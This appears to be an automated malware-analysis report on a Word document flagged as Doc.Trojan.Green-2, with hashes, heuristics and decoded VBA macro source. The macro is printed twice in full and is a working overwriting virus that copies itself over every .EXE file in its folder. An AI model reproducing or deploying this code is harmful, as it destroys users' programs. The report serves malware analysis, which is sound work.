Office (OLE) malware analysis — malicious · f779ec07c705add7

MALICIOUS

Office (OLE)

26.5 KB Created: 2000-12-30 18:36:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 77c0396241d9eb36db54926a749fb761 SHA-1: e34f03530d05d9c194f372a7dcd3cb20aba76163 SHA-256: f779ec07c705add757bd347c270c259722dbc88f2eea954b18c45601ed056a8a

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macro code, specifically within the 'trazi' subroutine, attempts to write a 24576-byte executable file to disk using the path derived from App.Path and App.EXEName. It also iterates through existing .EXE files in the application path, potentially overwriting them with the extracted payload. The ClamAV detection of 'Doc.Trojan.Green-2' further supports its malicious nature.

Heuristics 2

ClamAV: Doc.Trojan.Green-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Green-2
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 975 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	975 bytes
SHA-256: `185c62be9080b0f820d6aaf19dfcc88395e24d566aac71b72f7a2c5fb0cd0b55`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Option Explicit Dim erej() As Byte Dim zrtva As String Const velicina As Integer = 24576 Private Sub Form_Load() On Error Resume Next trazi End Sub Sub trazi() Dim Free Free = FreeFile Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free ReDim erej(velicina) Get #1, 1, erej Close #Free zrtva = Dir(App.Path & "\" & "*.EXE") While zrtva <> "" Open App.Path & "\" & zrtva For Binary Access Write As #Free Put #1, , erej Put #1, , velicina Close #Free zrtva = Dir() Wend 'HLLO.GreenDay by e[ax] 'Greetz to all ppl on #virus 'Pozdravljam cijeli BiHNet.ORG 'Pain: 10x for help End Sub

SHA-256: 185c62be9080b0f820d6aaf19dfcc88395e24d566aac71b72f7a2c5fb0cd0b55

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Option Explicit
 Dim erej() As Byte
 Dim zrtva As String
 Const velicina As Integer = 24576
 Private Sub Form_Load()
 On Error Resume Next
 trazi
 End Sub
 Sub trazi()
 Dim Free
 Free = FreeFile
 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
 ReDim erej(velicina)
 Get #1, 1, erej
 Close #Free
 zrtva = Dir(App.Path & "\" & "*.EXE")
 While zrtva <> ""
 Open App.Path & "\" & zrtva For Binary Access Write As #Free
 Put #1, , erej
 Put #1, , velicina
 Close #Free
 zrtva = Dir()
 Wend
 'HLLO.GreenDay by e[ax]
 'Greetz to all ppl on #virus
 'Pozdravljam cijeli BiHNet.ORG
 'Pain: 10x for help
 End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.